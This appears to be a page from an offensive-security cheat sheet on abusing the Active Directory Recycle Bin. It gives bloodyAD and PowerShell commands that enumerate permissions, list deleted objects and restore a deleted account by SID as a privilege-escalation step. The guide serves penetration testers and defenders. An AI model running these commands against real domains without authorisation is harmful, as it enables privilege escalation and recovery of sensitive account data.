ad-adds-recycle-bin.md (3204B)
1 --- 2 title: "Active Directory - Recycle Bin" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adds-recycle-bin.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-recycle-bin.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Recycle Bin 12 13 ## Details 14 15 * Deleted objects have a default retention time of 180 days 16 * Recycle Bin path: `CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com` 17 18 Enable Active Directory Recycle Bin in PowerShell 19 20 ```ps1 21 Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com' -Scope ForestOrConfigurationSet -Target 'contoso.com' 22 ``` 23 24 ## Deleted Objects 25 26 **Requirements**: 27 28 * `LIST_CHILD` right on the Deleted Objects container 29 * OID `1.2.840.113556.1.4.2064`: shows deleted, tombstoned, and recycled 30 31 **Exploitation**: 32 33 * List rights 34 35 ```ps1 36 bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 get search -c 1.2.840.113556.1.4.2064 --resolve-sd --attr ntsecuritydescriptor --base 'CN=Deleted Objects,DC=domain,DC=local' --filter "(objectClass=container)" 37 ``` 38 39 * Check all rights from the requirements 40 41 ```ps1 42 bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get writable --include-del 43 ``` 44 45 * List deleted objects with bloodyAD 46 47 ```ps1 48 bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 get search -c 1.2.840.113556.1.4.2064 --filter '(isDeleted=TRUE)' --attr name 49 ``` 50 51 * List deleted objects with PowerShell 52 53 ```ps1 54 Get-ADObject -Filter 'Name -Like "*User*"' -IncludeDeletedObjects 55 ``` 56 57 ## Restore Objects 58 59 **Requirements**: 60 61 * `Restore Tombstoned` right on the domain object 62 * `Generic Write` right on the deleted object 63 * `Create Child` right on the OU used for restoration 64 65 By default, only Domain Admins are able to list and restore deleted objects. 66 67 On restoration some objects retains attributes: 68 69 * Deleted objects retain all their attributes (including sensitive ones) 70 * Tombstoned objects retain most important attributes 71 72 **Exploitation**: 73 74 * Check restore rights 75 76 ```ps1 77 bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd 78 79 bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 get search -c 1.2.840.113556.1.4.2064 --filter '(&(isDeleted=TRUE)(sAMAccountName=deleted-computer$))' --attr ntsecuritydescriptor --resolve-sd 80 81 bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'CN=Users,DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd 82 ``` 83 84 * Restore the object using the sAMAccountName or objectSID 85 86 ```ps1 87 bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 set restore 'S-1-5-21-1394970401-3214794726-2504819329-1104' 88 ``` 89 90 ## References 91 92 * [Have You Looked in the Trash? Unearthing Privilege Escalations from the Active Directory Recycle Bin - @CravateRouge - June 25, 2025](https://cravaterouge.com/articles/ad-bin/)